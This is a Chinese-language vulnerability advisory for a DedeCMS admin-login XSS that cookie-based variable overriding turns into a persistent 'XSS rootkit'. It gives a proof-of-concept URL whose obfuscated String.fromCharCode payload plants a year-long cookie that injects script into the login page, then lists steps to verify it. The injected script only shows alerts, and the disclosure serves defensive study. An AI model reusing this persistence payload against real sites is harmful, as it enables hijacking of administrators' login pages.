影響版本:
DEDECMS全版本
?
漏洞描敘:
DEDECMS后臺登陸模板中的gotopage變量未效驗傳入數據,導致XSS漏洞。
\dede\templets\login.htm
65行左右
<input type="hidden" name="gotopage" value="<?php if(!empty($gotopage)) echo $gotopage;?>" />
由于DEDECMS的全局變量注冊機制,該變量內容可以被COOKIE變量覆蓋,COOKIE可以在客戶端持久化存儲,最終導致一個XSS ROOTKIT。
?
漏洞危害:
管理員在觸發DEDECMS任意的XSS漏洞(如留言本XSS)后,可以通過該漏洞永久劫持覆蓋gotopage變量,在DEDECMS的后臺登陸頁面永久嵌入任意的惡意代碼。?
?
驗證:
1.復制粘貼下面的URL訪問,觸發XSS安裝XSS ROOTKIT,注意IE8/9等會攔截URL類型的XSS漏洞,需關閉XSS篩選器。
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
2.關閉瀏覽器,無論怎么訪問下面的任意URL,都會觸發我們的XSS。
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
http://v57.demo.dedecms.com/dede/login.php
參考:
深掘XSS漏洞場景之XSS Rootkit[完整修訂版]
http://www.80sec.com/%e6%b7%b1%e6%8e%98xss%e6%bc%8f%e6%b4%9e%e5%9c%ba%e6%99%af%e4%b9%8bxss-rootkit-%e4%bf%ae%e8%ae%a2.html
)
)
)
![python[進階] 6.使用一等函數實現設計模式](http://pic.xiahunao.cn/python[進階] 6.使用一等函數實現設計模式)
![Spring的IOC原理[通俗解釋一下]](http://pic.xiahunao.cn/Spring的IOC原理[通俗解釋一下])
)